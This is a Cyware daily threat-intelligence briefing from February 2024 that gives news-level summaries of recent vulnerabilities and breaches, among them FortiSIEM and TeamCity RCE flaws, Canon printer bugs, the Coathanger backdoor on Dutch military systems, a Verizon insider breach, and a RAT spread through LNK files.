Cyware Daily Threat Intelligence
Daily Threat Briefing • Feb 7, 2024
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Feb 7, 2024
Several critical buffer overflow vulnerabilities have hit Canon’s small office multifunction printers and laser printers, posing significant risks. In other news, Fortinet's FortiSIEM product faced two maximum-severity security vulnerabilities, both potentially enabling RCE attacks by unauthenticated attackers. More clarification from Fortinet is awaited. An exposed API instance at Spoutible, a social media platform, has also been reported that may result in account hijacking. Threat actors could access 2FA secrets, including password reset tokens.
A similar server takeover threat hounds JetBrains’s TeamCity On-Premises servers owing to a critical security issue. On the malware side, illegal gambling files are distributing a RAT malware through shortcut LNK files.
Military systems compromised by Chinese
Dutch intelligence agencies revealed that Chinese state-backed hackers breached Dutch military systems in early 2023, utilizing a zero-day exploit in a Fortinet VPN. The attack targeted a segmented network with limited users, stealing user account data from the Active Directory server. The backdoor malware used for persistence was Coathanger, specifically tailored for FortiGate appliances. Despite applying patches, the devices may still be infected, necessitating system reformatting.
Verizon privacy breach exposes personal data
Verizon notified more than 63,000 individuals, mostly current employees, of a breach where an insider accessed personal data without authorization. The incident, attributed to "inadvertent disclosure" and "insider wrongdoing," exposed names, addresses, SSNs, and other sensitive information. There's no indication of malicious intent or external sharing, an investigation revealed.
Security bug exposes users to account hijacking
A publicly exposed API pertaining to the social media platform Spoutible was spotted putting its users at the risk of account hijacking. Security consultant Troy Hunt discovered a flaw in its API, which exposed users' hashed passwords, authentication factors, and password reset tokens. Compounded by weak password policies, attackers armed with this data could easily gain unauthorized access to accounts.
RAT disguised as illegal gambling files
AhnLab uncovered the distribution of a RAT malware masquerading as illicit gambling-related content. The malware is propagated through shortcut files (.lnk) that trigger the download of the RAT via HTA. The malicious PowerShell command embedded within the shortcut initiates the download process from specified URLs, leading to the installation of the RAT. The malware's sophisticated capabilities include keylogging, credential theft, and more.
Canon printers receive security updates
Canon released software updates to patch seven critical severity flaws found in various small office printer models. These buffer overflow bugs, exploitable over the network, could lead to RCE or DoS attacks. The affected components include PDL resource download, password process, and probe request. Firmware versions 03.07 and earlier are vulnerable, affecting models such as i-SENSYS LBP673Cdw and imageCLASS MF753CDW. No reports of exploitation so far.
Azure HDInsight services vulnerable to attacks
Three security vulnerabilities have been uncovered in Azure HDInsight's Apache Hadoop, Kafka, and Spark services, allowing for privilege escalation and DoS attacks. The flaws (CVE-2023-36419, CVE-2023-38156, and a ReDoS vulnerability) affect authenticated users, enabling attackers to gain cluster administrator privileges or disrupt system operations. Microsoft has released fixes following disclosure by Orca security researchers.
RCE bugs found in FortiSIEM
Fortinet's FortiSIEM product is affected by two severity flaws having a CVSS score of 10, CVE-2024-23108 and CVE-2024-23109, both allowing for RCE attacks. These flaws enable unauthenticated attackers to execute unauthorized commands via specially crafted API requests. While Fortinet's advisory links to an older issue, recent updates suggest the issues may affect newer FortiSIEM versions. Further clarification from Fortinet is awaited.
Authentication bypass bug threatens on-premise servers
JetBrains issued an urgent warning for TeamCity On-Premises server users to patch a critical authentication bypass flaw impacting versions 2017.1 through 2023.11.2. CVE-2024-23917, exploitable for RCE without user interaction, poses a significant risk of server takeover. The company advises immediate updates or temporary isolation for exposed on-premises servers. With over 2,000 online servers potentially vulnerable, the threat remains significant.
Code execution threat hovers over Chrome
Multiple vulnerabilities in Google Chrome were discovered, including a use-after-free issue in Mojo and a heap buffer overflow in Skia. It could allow attackers to execute arbitrary code within the context of the logged-in user, potentially enabling them to install programs, manipulate data, or create new accounts with elevated privileges. While there are no known instances of exploitation in the wild, updates have been issued for Windows, Mac, and Linux users.
High-severity flaws in Linux shim
A high-severity vulnerability in the shim component of Linux has been reported, which could permit the installation of firmware-level malware. Tracked as CVE-2023-40547, the buffer overflow flaw could enable attackers to execute malicious firmware during the early stages of the boot process, bypassing secure boot protections. While exploitation requires specific conditions, such as booting from an HTTP server, the risk is significant due to the potential for persistent malware installation.